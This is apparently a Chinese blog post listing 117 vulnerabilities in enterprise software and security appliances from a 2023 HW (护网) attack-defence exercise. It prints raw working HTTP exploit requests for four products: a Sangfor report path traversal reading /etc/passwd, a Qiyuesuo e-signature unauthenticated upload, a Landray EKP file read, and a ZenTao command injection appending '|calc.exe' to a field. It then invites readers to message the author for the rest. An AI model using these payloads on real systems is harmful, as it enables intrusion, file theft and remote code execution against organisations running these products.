2023HW护网100+个漏洞poc

1 . 飞企互联 FE 业务协作平台 magePath 参数文件读取漏洞
2 . 360 新天擎终端安全管理系统信息泄露漏洞
3 . Adobe ColdFusion 反序列化漏洞CVE-2023-29300
4 . Coremail 邮件系统未授权访问获取管理员账密POC
5 . CVE-2023-27372 SPIP CMS远程代码执行漏洞
6 . CVE-2023-28432 MinIO集群模式信息泄露漏洞复现
7 . CVE-2023-3450 锐捷Ruijie路由器命令执行漏洞
8 . Eramba任意代码执行漏洞
9 . FineReport_channel_Deserialization_Vulnerabilities_RCE-0
10 . GDidees CMS任意文件上传漏洞复现与利用分析
11 . gitlab路径遍历读取任意文件漏洞
12 . HIKVISION iSecure Center综合安防管理平台文件上传
13 . HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC
14 . HiKVISION 综合安防管理平台 report 任意文件上传漏洞
15 . HiKVISION综合安防管理平台env信息泄漏
16 . HIKVISION视频编码设备接入网关showFile
17 . Jeecg-Boot Freemarker 模版注入漏洞(疑似)
18 . KubePi JwtSigKey 登陆绕过漏洞CVE-2023-22463
19 . Kuboard默认口令
20 . Metabase validate 远程命令执行漏洞CVE-2023-38646
21 . Milesight VPN server
22 . Nacos-Sync未授权漏洞
23 . OfficeWeb365 远程代码执行漏洞
24 . Openfire身份认证绕过漏洞(CVE-2023-32315)
25 . Panabit iXCache网关RCE漏洞CVE-2023-38646
26 . Panel loadfile 后台文件读取漏洞
27 . PigCMS action_flashUpload 任意文件上传漏洞
28 . QAX-Vpn存在x遍历及任意账号密码修改漏洞
29 . Yakit任意文件读取
30 . 中远麒麟堡垒机SQL注入
31 . 云终端安全管理系统 login SQL注入漏洞
32 . 亿赛通 -UploadFileFromC
33 . 任我行 CRM SmsDataList SQL注入漏洞
34 . 任我行CRM系统SQL注入漏洞
35 . 企业微信0day
36 . 企业微信0dayAgentinfo接口Secret信息泄露
37 . 华天动力oa SQL注入
38 . 各厂家产品默认密码汇总
39 . 启明天钥安全网关前台sql注入
40 . 启明星辰-4A 统一安全管控平台 getMater 信息泄漏
41 . 大华智慧园区任意密码读取攻击
42 . 大华智慧园区综合管理平台 searchJson SQL注入漏洞
43 . 大华智慧园区综合管理平台 文件上传漏洞
44 . 大华智慧园区综合管理平台getFaceCaptureSQL注入漏洞
45 . 大华智慧园区综合管理平台video任意文件上传漏洞
46 . 契约锁电子签章系统 RCE
47 . 安恒明御运维审计与风险控制系统堡垒机任意用户注册
48 . 安恒蜜罐2
49 . 宏景 HCM codesettree SQL 注入漏洞
50 . 宏景OA文件上传
51 . 广联达 Linkworks GetIMDictionarySQL 注入漏洞
52 . 广联达oa sql注入漏洞 POC
53 . 广联达oa 后台文件上传漏洞 POC
54 . 新开普智慧校园系统代码执行漏洞
55 . 明御运维审计与风险控制系统堡垒机任意用户注册
56 . 明源云 ERP ApiUpdate
57 . 普元 EOS default jmx 远
58 . 锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露
59 . 汉得SRM tomcat
60 . 泛微 E-Cology 某版本 SQL注入漏洞 POC
61 . 泛微 HrmCareerApplyPerView S Q L 注入漏洞
62 . 泛微 ShowDocsImagesql注入漏洞
63 . 泛微 Weaver E-Office9 前台文件包含
64 . 泛微E-Office uploadify
65 . 泛微E-Office9文件上传漏洞 CVE-2023-2523 POC
66 . 泛微E-Office9文件上传漏洞 CVE-2023-2648 POC
67 . 泛微Weaver E-Office9
68 . 深信服 sxf-报表系统 任意命令执行漏洞版本有限制
69 . 深信服应用交付系统命令执行漏洞
70 . 深信服应用交付系统敏感信息泄露
71 . 深信服报表 任意读取
72 . 深信服数据中心管理系统 XML 实体注入漏洞
73 . 用友 NC Cloud jsinvoke 任意文件上传漏洞
74 . 用友 NC Cloud jsinvoke 任意文件上传漏洞
75 . 用友 移动管理系统 uploadApk
76 . 用友GRP-U8存在信息泄露
77 . 用友nc-cloudRCE
78 . 用友文件服务器认证绕过
79 . 用友时空 KSOA servletimagefield 文件 sKeyvalue 参数SQL 注入
80 . 用友时空 KSOATaskRequestServlet sql注入漏洞
81 . 用友时空KSOA PayBill SQL注入漏洞
82 . 用友畅捷通 T注入
83 . 用有畅捷通T+GetStoreWarehouseByStore RCE漏洞
84 . 百卓 Smart S85F 后台文件上传
85 . 禅道 16
86 . 禅道v18
87 . 移动管理系 统 uploadApk
88 . 红帆 oa 注入
89 . 红帆OA zyy_AttFile
90 . 绿盟 NF 下一代防火墙 任意文件上传漏洞
91 . 绿盟 sas 安全审计系统任意文件读取
92 . 绿盟 SAS堡垒机 Exec 远程命令执行漏洞
93 . 绿盟 SAS堡垒机 GetFile 任意文件读取漏洞
94 . 绿盟 SAS堡垒机 local_user
95 . 网御 ACM 上网行为管理系统bottomframe
96 . 网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞 POC
97 . 网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞 POC
98 . 致远 OA 协同管理软件无需登录getshell
99 . 致远OA_V8
100 . 致远OA任意管理员登录
101 . 苹果RCE(CVE-2021-30860
102 . 蓝凌EKP远程代码执行漏洞
103 . 蓝凌OA前台代码执行
104 . 辰信景云终端安全管理系统 login SQL 注入漏洞
105 . 远秋医学技能考试系统SQL注入
106 . 通达OA sql注入漏洞 CVE-2023-4165 POC
107 . 通达OA sql注入漏洞 CVE-2023-4166 POC
108 . 金和OA C6-GetSgIData
109 . 金和OA 未授权
110 . 金山EDR RCE漏洞
111 . 金山WPS RCE
112 . 金山WPS RCE
113 . 金山终端安全系统V9任意文件上传漏洞
114 . 金盘 微信管理平台 getsysteminfo 未授权访问漏洞
115 . 金盘图书馆微信管理后台 getsysteminfo 未授权访问漏洞
116 . 金蝶云星空 CommonFileserver 任意文件读取漏洞
117 . 锐捷 NBR 路由器 fileupload

 漏洞详情

深信服报表 任意读取

GET /report/download.php?pdf=../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:85
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

契约锁电子签章系统 RCE

POST /callback/%2E%2E;/code/upload HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type:multipart/form-data;

boundary=----GokVTLZMRxcJWKfeCvEsYHlszxE
----GokVTLZMRxcJWKfeCvEsYHlszxE
Content-Disposition: form-data; name="type";

TIMETASK
----GokVTLZMRxcJWKfeCvEsYHlszxE
Content-Disposition: form-data; name="file"; filename="qys.jpg"

马儿

----GokVTLZMRxcJWKfeCvEsYHlszxE

蓝凌EKP远程代码执行漏洞

/api///sys/ui/sys_ui_extend/sysUiExtend.do

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: /
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}

禅道v18.0-v18.3后台命令执行

POST /zentaopms/www/index.php?m=zahost&f=create HTTP/1.1
Host: 127.0.0.1
UserAgent: Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:109.0)Gecko/20100101Firefox/110.0Accept:application/json,text/javascript,*/*;q=0.01
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding:gzip,deflate
Referer:http://127.0.0.1/zentaopms/www/index.php?m=zahost&f=create
Content-Type:application/x-www-form-urlencoded;charset=UTF-8
X-Requested-With:XMLHttpRequest
Content-Length:134
Origin:http://127.0.0.1
Connection:close
Cookie:zentaosid=dhjpu2i3g51l6j5eba85aql27f;lang=zhcn;device=desktop;theme=default;tab=qa;windowWidth=1632;windowHeight=783
Sec-Fetch-Dest:empty
Sec-Fetch-Mode:cors
Sec-Fetch-Site:same-origin

vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0.1%7Ccalc.exe&cpuCores=
2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=za

获取剩余POC请在后台私信我回复【2023护网】即可

你可能感兴趣的:(安全,网络,web安全,密码学,网络安全,ddos,计算机网络)